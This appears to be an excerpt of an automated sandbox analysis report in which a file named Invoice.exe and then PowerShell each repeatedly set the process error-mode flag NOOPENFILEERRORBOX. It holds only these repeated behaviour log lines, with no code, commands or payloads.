Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
